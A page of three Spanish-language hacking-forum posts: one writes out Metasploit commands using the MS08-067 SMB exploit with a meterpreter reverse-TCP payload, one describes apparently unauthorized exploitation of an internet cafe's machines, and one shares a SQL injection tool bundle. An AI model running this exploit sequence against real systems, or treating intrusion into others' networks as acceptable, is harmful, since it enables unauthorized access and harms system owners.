elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección


  Mostrar Temas
Páginas: 1 2 3 4 [5]
41  Seguridad Informática / Hacking / Ayuda con MSF en: 13 Febrero 2010, 23:45 pm
Duda Metasploit.

Ok gente sere breve en mi duda:

Escaneo una IP con el Nmap....

Código:
PORT    STATE SERVICE      VERSION

139/tcp open  netbios-ssn

445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds

Tiene el puerto 445 abierto (vulnerabilidad en el SMB), luego abro mi consola de MSF y....
Citar
msf> use windows/smb/ms08_067_netapi

Luego de esto elijo el PAYLOAD:
Código:
msf> use PAYLOAD windows/meterpreter/reverse_tcp

Introduzco todas las variables con el comando "set"...
Código:
set RHOST 200.xx.xx.xx
set LHOST 192.168.x.xx
set RPORT 445
set LPORT 4444
set TARGET 0

y finalmente
Código:
msf> exploit

El asunto esta en que consigo mi sesion con el meterpreter sin problema alguno, pero cuando salgo de la consola del meterpreter y posteriormente del MSF, no puedo volver a conectar con el host pues da el siguiente error:

http://picasaweb.google.com/lh/photo/i0Ya_l659UiyRlKj92MIAA?feat=directlink

Sera porque el host se queda con la sesion anterior del Meterpreter?
Y si es asi, como consigo que no me siga pasando pues la cosa esta que solo consigo entrar a la pc victima una sola vez   :-\


Post data
estas pruebas las hago en mi casa pues tengo varias pc´s que uso como conejillos de india.


42  Seguridad Informática / Hacking / Seguridad por las ISP? en: 9 Febrero 2010, 23:05 pm
Wenas..........

Sere breve en mi pregunta, El asunto es que quisiera saber si las ISP juegan algun papel en la seguridad de sus usuarios.

Mi duda viene al caso de cuando escaneo (con Nmap) un objetivo estando yo dentro de una red LAN (fisicamente dentro) puedo ver una cantidad de puertos abiertos y servicios corriendo, pero cuando lo hago desde fuera obtengo resultados diferentes y menos alentadores (menos puertos abiertos, menos servicios corriendo, menos vulnerabilidades). 

El escenario en concreto es un cyber, es decir estando dentro del cyber escaneo, busco informacion, comprendo la topologia de la red, modelos de aparatos y toda la informacion que puedo conseguir, entonces estando en mi casa trato de auditar esa seguridad (bonita palabra "auditar"), consigo explotar ciertas vulnerabilidades y logro abrir una sesion con el meterpreter de MSF, pero vaya que es mas dificil.

¿LAS ISP JUEGAN ALGUN PAPEL EN LA SEGURIDAD DE SUS USUARIOS?

Gracias de antemano....
43  Seguridad Informática / Nivel Web / SQL Injections Tools en: 4 Octubre 2009, 03:05 am
Buenas noches a todos, gente buena que forma este increible foro.

Navegando por la WEB encontre todo un arsenal de herramientas para inyectar todos los sitios web que sufran esta vulnerabilidad con una letal dosis de SQL  (Es broma solo queria sonar un poco malvado  :P ).

Espero les guste mi aporte.

Saludos a todos.



http://rapidshare.com/files/202049053/SQL_AIO.zip

Aca esta el Pass: http://www.level-23.com/foro


Páginas: 1 2 3 4 [5]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines